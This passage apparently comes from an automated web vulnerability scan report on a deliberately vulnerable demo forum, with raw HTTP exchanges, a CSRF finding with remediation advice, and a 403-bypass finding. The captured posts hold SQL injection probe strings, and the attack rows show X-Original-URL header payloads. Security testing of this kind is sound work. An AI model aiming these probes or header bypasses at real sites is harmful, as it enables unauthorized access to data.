Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=7 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=8 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4123 |
| Response Body - size: 4,123 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=9 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4129 |
| Response Body - size: 4,129 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%' -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| Instances | 139 |
| Solution |
Phase: Architecture and Design
Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
For example, use anti-CSRF packages such as the OWASP CSRFGuard.
Phase: Implementation
Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.
Phase: Architecture and Design
Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).
Note that this can be bypassed using XSS.
Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.
Note that this can be bypassed using XSS.
Use the ESAPI Session Management control.
This control includes a component for CSRF.
Do not use the GET method for any request that triggers a state change.
Phase: Implementation
Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.
|
| Reference |
http://projects.webappsec.org/Cross-Site-Request-Forgery
http://cwe.mitre.org/data/definitions/352.html |
| Tags |
OWASP_2021_A01
WSTG-v42-SESS-05 OWASP_2017_A05 |
| CWE Id | 352 |
| WASC Id | 9 |
| Plugin Id | 10202 |
|
Medium |
Bypassing 403 |
|---|---|
| Description |
Bypassing 403 endpoints may be possible, the scan rule sent a payload that caused the response to be accessible (status code 200).
|
| URL | http://testasp.vulnweb.com/ |
| Method | GET |
| Parameter | |
| Attack | X-Original-URL: /avatars |
| Evidence | |
| Request Header - size: 251 bytes. |
GET http://testasp.vulnweb.com/ HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache X-Original-URL: /avatars Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDCQRDQBRC=NPJDKBOCDBLEFPFPHFAJODAP; path=/ X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:21:33 GMT Content-Length: 3561 |
| Response Body - size: 3,561 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>117</td><td>117</td><td>3/14/2022 8:20:45 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/ |
| Method | GET |
| Parameter | |
| Attack | X-Original-URL: /Images |
| Evidence | |
| Request Header - size: 250 bytes. |
GET http://testasp.vulnweb.com/ HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache X-Original-URL: /Images Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDCQRDQBRC=OPJDKBOCBPDNMFPGMJJGCJJL; path=/ X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:21:34 GMT Content-Length: 3561 |
| Response Body - size: 3,561 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>117</td><td>117</td><td>3/14/2022 8:20:45 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/ |
| Method | GET |
| Parameter | |
| Attack | X-Original-URL: /jscripts |
| Evidence | |
| Request Header - size: 252 bytes. |
GET http://testasp.vulnweb.com/ HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache X-Original-URL: /jscripts Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDCQRDQBRC=AAKDKBOCJOBOGFCDOCNHBJLH; path=/ X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:21:39 GMT Content-Length: 3561 |
| Response Body - size: 3,561 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>117</td><td>117</td><td>3/14/2022 8:20:45 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> 